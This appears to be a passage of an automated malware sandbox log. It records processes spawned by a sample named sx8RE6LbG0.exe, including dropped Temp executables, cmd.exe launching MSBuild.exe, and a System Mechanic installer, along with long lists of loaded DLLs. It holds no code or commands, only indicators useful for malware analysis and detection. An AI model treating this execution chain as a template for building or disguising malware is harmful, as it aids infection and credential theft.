Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4164 --field-trial-handle=1960,i,3941094488393127091,5949992932868240586,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Process created: C:\Users\user\AppData\Local\Temp\u2ts.0.exe "C:\Users\user\AppData\Local\Temp\u2ts.0.exe"	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Process created: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe "C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe"	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Process created: C:\Users\user\AppData\Local\Temp\u2ts.3.exe "C:\Users\user\AppData\Local\Temp\u2ts.3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1960,i,3941094488393127091,5949992932868240586,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4164 --field-trial-handle=1960,i,3941094488393127091,5949992932868240586,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1604 --field-trial-handle=1968,i,3321473652488425193,11369094571635147960,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: zipfldr.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: schedcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: idndl.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ucrtbase_clr0400.dll
